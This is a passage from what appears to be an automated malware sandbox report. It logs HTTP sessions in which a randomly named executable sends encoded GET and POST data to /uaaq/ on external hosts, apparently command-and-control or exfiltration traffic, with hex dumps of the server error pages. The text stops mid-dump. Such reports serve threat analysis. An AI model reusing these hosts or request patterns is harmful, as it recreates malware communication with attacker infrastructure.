                                                                                    Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    93192.168.11.304985383.229.19.76803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:40.466039896 CET430OUTGET /uaaq/?9pG0L=EGijkzvOzpvUykTSqEH5xYloxulInJA6Yfy3UgRPmiIu9LDG8q5Bov6ZnoBY4U7UUr/swV4XyGGNsY5GmvOqPiqhu9t92ITdQQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:40.643599033 CET1340INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:40 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 35 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 6f 74 75 6e 64 65 77 72 69 74 65 73 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20
                                                                                    Data Ascii: 5d6<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.ayotundewrites.com | Powered by www.lws.fr</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short
                                                                                    Dec 4, 2023 12:10:40.643672943 CET426INData Raw: 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61
                                                                                    Data Ascii: error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it
                                                                                    Dec 4, 2023 12:10:40.644722939 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    94192.168.11.304985491.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:46.065005064 CET698OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.popup-shops.us
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.popup-shops.us
                                                                                    Referer: http://www.popup-shops.us/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 54 6b 5a 76 41 76 42 64 33 68 43 63 38 79 33 31 37 2f 51 73 6b 2f 2b 53 4f 75 73 2b 79 2b 5a 51 47 70 31 34 72 74 6e 4d 44 39 77 72 45 38 7a 4c 36 39 43 41 33 6c 6c 46 35 4e 48 46 61 5a 56 6a 78 69 38 50 38 7a 41 41 57 7a 4b 45 76 38 65 43 38 39 6d 4a 6a 31 78 4e 6b 34 6f 77 47 55 37 71 31 54 70 52 63 63 49 4a 70 44 45 56 6c 33 6b 64 2f 4a 67 6f 59 6d 4d 65 78 38 38 46 44 48 59 54 6a 69 79 61 6d 64 4d 6f 64 43 62 77 6a 30 77 2b 57 74 57 74 58 77 50 76 6c 59 6b 44 71 56 74 41 35 63 75 74 76 35 6f 58 57 30 41 48 36 66 78 62 5a 67 3d 3d
                                                                                    Data Ascii: 9pG0L=TkZvAvBd3hCc8y317/Qsk/+SOus+y+ZQGp14rtnMD9wrE8zL69CA3llF5NHFaZVjxi8P8zAAWzKEv8eC89mJj1xNk4owGU7q1TpRccIJpDEVl3kd/JgoYmMex88FDHYTjiyamdModCbwj0w+WtWtXwPvlYkDqVtA5cutv5oXW0AH6fxbZg==
                                                                                    Dec 4, 2023 12:10:46.247556925 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:10:46 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    95192.168.11.304985591.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:48.765856981 CET718OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.popup-shops.us
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.popup-shops.us
                                                                                    Referer: http://www.popup-shops.us/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 54 6b 5a 76 41 76 42 64 33 68 43 63 6d 53 6e 31 39 73 6f 73 31 66 2b 56 42 4f 73 2b 6e 4f 5a 55 47 70 35 34 72 76 4b 58 44 75 55 72 45 64 44 4c 37 2f 71 41 6e 31 6c 46 79 74 48 45 46 4a 56 34 78 69 77 74 38 33 41 41 57 79 71 45 76 38 4f 43 2f 4b 4b 4b 6a 6c 78 50 39 6f 6f 2b 4a 30 37 71 31 54 70 52 63 63 4d 76 70 44 63 56 6b 48 30 64 38 74 30 6e 5a 6d 4d 64 35 63 38 46 52 33 59 58 6a 69 79 6f 6d 63 51 4f 64 42 6a 77 6a 31 41 2b 57 38 57 75 65 77 50 74 68 59 6c 58 6b 31 49 65 39 74 65 70 67 4c 49 61 4c 42 68 48 2f 4b 64 49 65 64 57 36 75 6e 78 47 69 51 67 5a 65 4e 6e 2b 50 50 33 53 74 6b 63 3d
                                                                                    Data Ascii: 9pG0L=TkZvAvBd3hCcmSn19sos1f+VBOs+nOZUGp54rvKXDuUrEdDL7/qAn1lFytHEFJV4xiwt83AAWyqEv8OC/KKKjlxP9oo+J07q1TpRccMvpDcVkH0d8t0nZmMd5c8FR3YXjiyomcQOdBjwj1A+W8WuewPthYlXk1Ie9tepgLIaLBhH/KdIedW6unxGiQgZeNn+PP3Stkc=
                                                                                    Dec 4, 2023 12:10:48.948324919 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:10:48 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    96192.168.11.304985691.195.240.1980
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:53.280410051 CET1635OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.popup-shops.us
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.popup-shops.us
                                                                                    Referer: http://www.popup-shops.us/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 54 6b 5a 76 41 76 42 64 33 68 43 63 6d 53 6e 31 39 73 6f 73 31 66 2b 56 42 4f 73 2b 6e 4f 5a 55 47 70 35 34 72 76 4b 58 44 75 63 72 46 76 37 4c 36 5a 69 41 6b 31 6c 46 39 39 48 4a 46 4a 56 35 78 68 41 70 38 32 38 51 57 32 61 45 75 65 32 43 72 75 65 4b 77 46 78 50 79 49 6f 7a 47 55 37 46 31 58 46 64 63 66 6b 76 70 44 63 56 6b 46 38 64 72 70 67 6e 62 6d 4d 65 78 38 39 4b 44 48 59 76 6a 69 36 53 6d 63 45 34 65 77 44 77 6b 56 51 2b 52 4b 4b 75 52 77 50 6a 73 34 6c 66 6b 31 30 2f 39 74 53 6c 67 4b 39 31 4c 47 74 48 38 38 51 50 62 50 57 79 34 68 59 37 6b 52 30 4a 61 49 58 56 62 63 76 71 78 7a 6d 37 36 7a 4e 75 5a 7a 48 50 32 78 47 38 58 49 33 61 46 6f 66 35 66 61 33 52 31 59 39 54 4f 75 6b 48 58 61 42 68 37 48 74 31 56 58 34 6c 38 76 6d 4d 61 6c 44 6a 30 5a 30 53 56 50 7a 56 6f 4c 4b 47 57 5a 6f 4b 4d 79 67 38 79 42 69 57 31 65 52 70 68 47 31 4f 6f 47 5a 56 48 73 6e 5a 6b 6c 70 47 6e 41 36 68 6e 61 35 65 57 48 6e 41 61 39 63 64 36 76 66 31 58 4e 77 56 4a 59 66 78 66 64 70 2f 6e 74 55 70 54 42 30 6d 44 2b 50 45 6f 75 35 62 68 4f 6b 6c 75 55 39 73 44 4b 69 6b 5a 6e 64 32 65 4e 70 4a 57 44 46 41 64 39 59 61 66 2b 5a 4a 4e 43 4d 56 5a 2f 77 44 58 59 51 2f 46 6e 43 78 42 4a 73 71 31 74 37 4a 42 66 71 6c 6d 30 49 76 61 72 62 48 4c 44 34 69 5a 6d 39 67 79 39 67 74 2b 33 76 6d 63 63 67 38 57 68 7a 78 6b 5a 54 33 70 48 41 4c 48 4c 2b 65 61 4d 64 59 57 6f 73 4e 4a 59 59 6f 36 7a 43 57 31 61 63 4c 67 49 63 56 35 71 51 79 4a 48 75 46 4c 43 73 69 47 2f 52 30 5a 59 65 79 53 31 79 57 63 59 6f 33 36 73 63 76 35 66 34 66 31 2f 67 4d 4e 51 53 79 53 70 73 69 65 59 4e 77 46 37 77 4e 35 5a 73 4f 57 4d 54 39 77 49 43 4b 7a 6e 50 4d 6b 66 4b 69 6c 63 54 4e 49 2b 44 65 39 35 36 4b 31 4b 53 65 49 49 62 55 4b 43 4a 46 6b 59 67 56 73 6b 6a 54 6e 72 6b 6f 44 52 41 69 32 33 74 4f 6e 78 50 4e 2f 50 48 41 7a 33 52 54 39 6c 4a 36 36 50 6b 41 31 6d 35 50 64 4d 66 6a 69 54 45 45 74 79 50 62 45 35 32 66 51 47 46 67 34 79 75 2b 6d 76 42 56 30 6c 64 52 71 36 51 67 45 33 69 36 52 75 42 58 73 57 76 64 73 45 47 39 34 4e 63 4a 37 59 61 63 63 33 51 74 6b 71 78 6a 56 74 50 4c 76 39 39 42 4e 6e 71 67 63 6b 63 78 65 31 43 41 49 4f 6b 66 41 5a 30 4a 63 75 65 6d 74 30 66 37 2f 50 63 67 33 37 35 7a 55 65 49 56 4b 2b 37 6e 77 38 64 68 69 35 62 52 77 30 35 58 34 41 2f 6e 31 64 71 36 75 36 6f 78 6a 61 2f 52 35 32 76 72 73 47 7a 62 57 36 62 36 35 4e 6e 37 75 51 62 53 44 6b 50 71 2f 6a 77 51 47 76 78 75 4c 64 70 37 72 72 55 66 4a 46 34 4b 4f 55 31 6c 4a 71 41 6c 39 62 37 48 65 44 77 5a 34 69 51 65 33 72 2f 50 70 49 4e 66 47 45 4b 35 4e 6a 2b 7a 6b 65 67 7a 57 49 71 69 34 70 53 55 41 74 73 43 4a 78 70 78 79 6d 7a 48 54 69 71 51 6d 74 31 53 4d 74 48 62 67 48 59 76 61 64 4f 38 6d 76 31 69 4d 6d 76 68 49 54 73 51 51 45 62 71 2f 5a 41 4d 56 44 6d 54 63 37 73 6a 66 4c 41 4e 31 6f 61 79 33 6d 69 78 52 65 33 73 68 6e 50 77 78 33 52 2f 54 79 59 39 41 4b 59 49 30 62 67 32 73 66 30 67 35 2f 6d 6e 71 66 31 6c 64 36 58 69 61 30 7a 48 33 51 4e 61 57 57 45 4f 30 50 67 35 39 43 2f 4f 6b 75 57 68 38 65 77 39 66 49 54 49 68 59 79 6b 76 51 71 75 46 38 57 52 79 62 6d 30 37 2f 70 48 75 42 66 53 43 49 30 36 51 47 54 62 62 51 4b 6e 33 73 48 68 54 61 7a 42 4d 76 6f 53 32 37 4f 6c 38 70 51 49 61 67 4d 57 72 38 